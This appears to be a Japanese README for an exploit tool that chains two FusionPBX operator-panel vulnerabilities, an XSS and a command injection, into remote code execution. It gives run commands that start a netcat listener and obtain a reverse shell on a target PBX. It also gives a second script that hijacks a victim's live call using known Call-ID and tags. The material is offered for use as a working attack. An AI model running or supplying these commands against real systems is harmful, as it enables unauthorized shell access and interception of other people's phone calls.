
CVE-2019-11408(オペレーターパネルのXSS)とCVE-2019-11409(オペレーターパネルのコマンドインジェクション)を連鎖させる。
このシンプルなコードは、Dustin Cobb によって Caller ID を使用した RCE – FusionPBX の複数の脆弱性 で紹介された連鎖的脆弱性の実装を完成させようとするものです。
netcat リスナーを起動します (rce_listener_address).x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat リスナーに接続し、リバースシェルを提供します。通話の Call-ID、from-tag、to-tag が分かっている場合、以下のコードを実行すると、被害者の代わりにあなたがその通話に入れ替わります。
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}